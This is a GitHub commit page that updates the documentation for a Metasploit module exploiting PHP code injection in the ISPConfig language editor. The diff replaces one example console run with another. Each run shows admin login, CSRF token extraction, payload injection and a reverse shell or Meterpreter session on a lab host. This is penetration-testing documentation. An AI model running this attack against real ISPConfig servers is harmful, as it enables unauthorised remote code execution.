Skip to content

Commit ffa2152

Browse files
msutovsky-r7msutovsky-r7
committed
Updates docs
1 parent 7d88156 commit ffa2152

File tree

1 file changed

+22
-30
lines changed

1 file changed

+22
-30
lines changed

documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md

Lines changed: 22 additions & 30 deletions
Original file line numberDiff line numberDiff line change
@@ -32,43 +32,35 @@ The ISPConfig administrator username to authenticate with.
3232
### PASSWORD
3333
The ISPConfig administrator password to authenticate with.
3434

35-
### LOGIN_TIMEOUT
36-
Timeout for login request (default: 15 seconds).
37-
38-
### DELETE_SHELL
39-
Whether to delete the webshell after exploitation (default: true).
4035

4136
## Scenarios
4237

4338
### ISPConfig 3.2.11 (or earlier), Ubuntu 20.04
4439

4540
```
46-
msf6 > use exploit/linux/http/ispconfig_lang_edit_php_code_injection
47-
msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set rhosts 192.168.1.100
48-
rhosts => 192.168.1.100
49-
msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set username admin
50-
username => admin
51-
msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set password adminpass
52-
password => adminpass
53-
msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
54-
55-
[*] Started reverse TCP handler on 192.168.1.1:4444
56-
[*] Running automatic check ('set AutoCheck false' to disable)
57-
[+] ISPConfig installation detected
58-
[*] Attempting login with username 'admin' and password 'adminpass'
41+
msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run verbose=true
42+
[*] Started reverse TCP handler on 192.168.168.128:4444
43+
[*] Running automatic check ("set AutoCheck false" to disable)
44+
[*] Checking if the target is ISPConfig...
45+
[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
46+
[+] Login successful!
47+
[+] ISPConfig version detected: ISPConfig Version: 3.2.10
48+
[+] The target appears to be vulnerable. Version: ISPConfig Version: 3.2.10
49+
[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
5950
[+] Login successful!
60-
[*] Injecting PHP shell...
61-
[+] CSRF tokens extracted: ID=abc123..., KEY=def456...
62-
[+] Shell successfully injected: sh_xxxxx.php
63-
[*] Starting payload handler...
64-
[+] PHP payload triggered
65-
[*] Waiting for session...
66-
[+] Shell responsive: uid=33(www-data) gid=33(www-data) groups=33(www-data)
67-
68-
id
69-
uid=33(www-data) gid=33(www-data) groups=33(www-data)
70-
uname -a
71-
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
51+
[*] Checking if admin_allow_langedit is enabled...
52+
[+] Language editor is accessible - admin_allow_langedit appears to be enabled
53+
[*] Injecting PHP payload...
54+
[+] Extracted CSRF tokens: ID=language_ed..., KEY=86845285663...
55+
[*] Sending stage (40004 bytes) to 192.168.168.186
56+
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.186:58822) at 2025-07-07 11:51:12 +0200
57+
58+
59+
meterpreter >
60+
meterpreter > sysinfo
61+
Computer : server1
62+
OS : Linux server1 6.8.0-60-generic #63~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 22 19:00:15 UTC 2 x86_64
63+
Meterpreter : php/linux
7264
```
7365

7466
## Notes

0 commit comments

Comments
 (0)